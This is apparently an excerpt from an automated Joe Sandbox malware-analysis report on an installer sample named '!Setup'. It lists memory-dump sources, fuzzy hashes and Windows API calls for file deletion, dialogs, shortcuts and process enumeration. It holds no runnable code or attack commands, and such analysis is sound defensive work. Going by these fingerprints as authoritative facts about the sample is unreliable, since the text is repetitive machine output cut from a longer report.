                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: FilePointer
                                                                                • String ID:
                                                                                • API String ID: 973152223-0
                                                                                • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                APIs
                                                                                • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                APIs
                                                                                • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: CallbackDispatcherUser
                                                                                • String ID:
                                                                                • API String ID: 2492992576-0
                                                                                • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                • String ID: $ @$M$N
                                                                                • API String ID: 1638840714-3479655940
                                                                                • Opcode ID: 60dec75628f9769c23c01a777027d1821986551530c1d832e54061f08b3160b2
                                                                                • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                • Opcode Fuzzy Hash: 60dec75628f9769c23c01a777027d1821986551530c1d832e54061f08b3160b2
                                                                                • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                APIs
                                                                                • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                Strings
                                                                                • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                • ptF, xrefs: 00406D1A
                                                                                • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                • \*.*, xrefs: 00406D2F
                                                                                • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                • API String ID: 2035342205-1650287579
                                                                                • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                  • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                  • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,74DF23A0,00000000), ref: 00406902
                                                                                • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                • String ID: F$A
                                                                                • API String ID: 3347642858-1281894373
                                                                                • Opcode ID: 9d23a5a8c0223ae690e18e5715e7d3cdc314298ad832e99d2ae59d35dee8c45f
                                                                                • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                • Opcode Fuzzy Hash: 9d23a5a8c0223ae690e18e5715e7d3cdc314298ad832e99d2ae59d35dee8c45f
                                                                                • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                • API String ID: 1916479912-1189179171
                                                                                • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                Strings
                                                                                • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: CreateInstance
                                                                                • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                • API String ID: 542301482-1377821865
                                                                                • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                APIs
                                                                                • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                  • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
